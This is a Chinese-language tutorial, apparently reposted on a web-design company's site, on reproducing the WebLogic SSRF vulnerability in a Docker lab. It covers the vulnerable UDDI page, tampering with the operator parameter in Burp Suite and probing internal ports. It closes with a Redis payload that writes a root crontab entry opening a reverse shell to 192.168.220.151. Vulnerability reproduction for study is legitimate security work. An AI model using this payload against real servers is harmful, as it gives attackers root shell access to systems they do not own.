今天就跟大家聊聊有關(guān)如何實現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)，可能很多人都不太了解，為了讓大家更加了解，小編給大家總結(jié)了以下內(nèi)容，希望大家根據(jù)這篇文章可以有所收獲。

創(chuàng)新互聯(lián)公司-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設(shè)、高性價比望江網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫,直接使用。一站式望江網(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設(shè)找我們，業(yè)務(wù)覆蓋望江地區(qū)。費用合理售后完善，十載實體公司更值得信賴。

一、使用docker搭建環(huán)境

docker安裝及搭建環(huán)境教程：https://www.freebuf.com/sectool/252257.html

訪問7001端口

二、漏洞復(fù)現(xiàn)步驟

1、漏洞存在頁面 /uddiexplorer/SearchPublicRegistries.jsp

2、檢查一下IBM這個地方看看

發(fā)現(xiàn)是個連接，這就可能存在ssrf了

3、使用burp suite抓包，點擊Search

4、修改operator參數(shù)的連接

5、訪問結(jié)果

訪問不存在的端口返回 could not connect over HTTP

訪問存在的端口返回狀態(tài)碼

訪問內(nèi)網(wǎng)

利用redis反彈shell的payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

看完上述內(nèi)容，你們對如何實現(xiàn)Weblogic SSRF漏洞復(fù)現(xiàn)有進(jìn)一步的了解嗎？如果還想了解更多知識或者相關(guān)內(nèi)容，請關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝大家的支持。

分享標(biāo)題：如何實現(xiàn)WeblogicSSRF漏洞復(fù)現(xiàn)
URL分享：http://jinyejixie.com/article18/pspigp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站設(shè)計公司、商城網(wǎng)站、定制網(wǎng)站、品牌網(wǎng)站制作、網(wǎng)站制作、定制開發(fā)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)